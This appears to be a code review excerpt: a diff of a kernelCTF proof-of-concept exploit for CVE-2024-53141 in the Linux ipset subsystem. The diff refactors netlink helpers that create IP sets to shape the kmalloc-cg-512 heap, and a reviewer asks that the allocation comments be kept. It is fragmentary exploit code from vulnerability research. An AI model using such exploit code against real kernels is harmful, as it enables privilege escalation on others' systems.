pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c

```diff
@@ -196,198 +196,145 @@ int netlink_open(int proto)
 
 	return s;
 }
-
-// Function to create an IP set under kmalloc-cg-512 cache
-int create_ip_set_kmalloc_512(int sock_fd, const char *set_name, const char *type_name, uint8_t family, int extra)
+// Helper function to set up a common Netlink message structure
+struct nlmsghdr *setup_ip_set_message(char *buf, int cmd_type, uint16_t flags,
+									  const char *set_name, const char *type_name,
+									  uint8_t family, int extra_header_size)
 {
-	char buf[1024];
 	struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf);
+	nlh->nlmsg_type = cmd_type;
+	nlh->nlmsg_flags = flags;
 
-	nlh->nlmsg_type = IPSET_CMD_CREATE | (6 << 8);
-	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
-
-	mnl_nlmsg_put_extra_header(nlh, 4);
+	mnl_nlmsg_put_extra_header(nlh, extra_header_size);
 
 	mnl_attr_put_u8(nlh, IPSET_ATTR_PROTOCOL, IPSET_PROTOCOL);
 	mnl_attr_put_strz(nlh, IPSET_ATTR_SETNAME, set_name);
-	mnl_attr_put_strz(nlh, IPSET_ATTR_TYPENAME, type_name);
+	if (type_name)
+	{ // Only CREATE commands need type_name
+		mnl_attr_put_strz(nlh, IPSET_ATTR_TYPENAME, type_name);
+	}
 	mnl_attr_put_u8(nlh, IPSET_ATTR_FAMILY, family);
 	mnl_attr_put_u8(nlh, IPSET_ATTR_REVISION, 0);
 
-	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
+	return nlh;
+}
 
-	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
+// Function to create an IP set under kmalloc-cg-512 cache
+int create_ip_set_kmalloc_512(int sock_fd, const char *set_name, const char *type_name,
+							  uint8_t family, int extra)
+{
+	char buf[1024];
+	struct nlmsghdr *nlh = setup_ip_set_message(buf, IPSET_CMD_CREATE | (6 << 8),
+												NLM_F_REQUEST | NLM_F_ACK,
+												set_name, type_name, family, 4);
 
-	// 0x35*8+0x58 is under kmalloc-cg-512
```

Comment:
Please do not remove these very useful comments. Without these, it's much harder to understand what's allocated and where.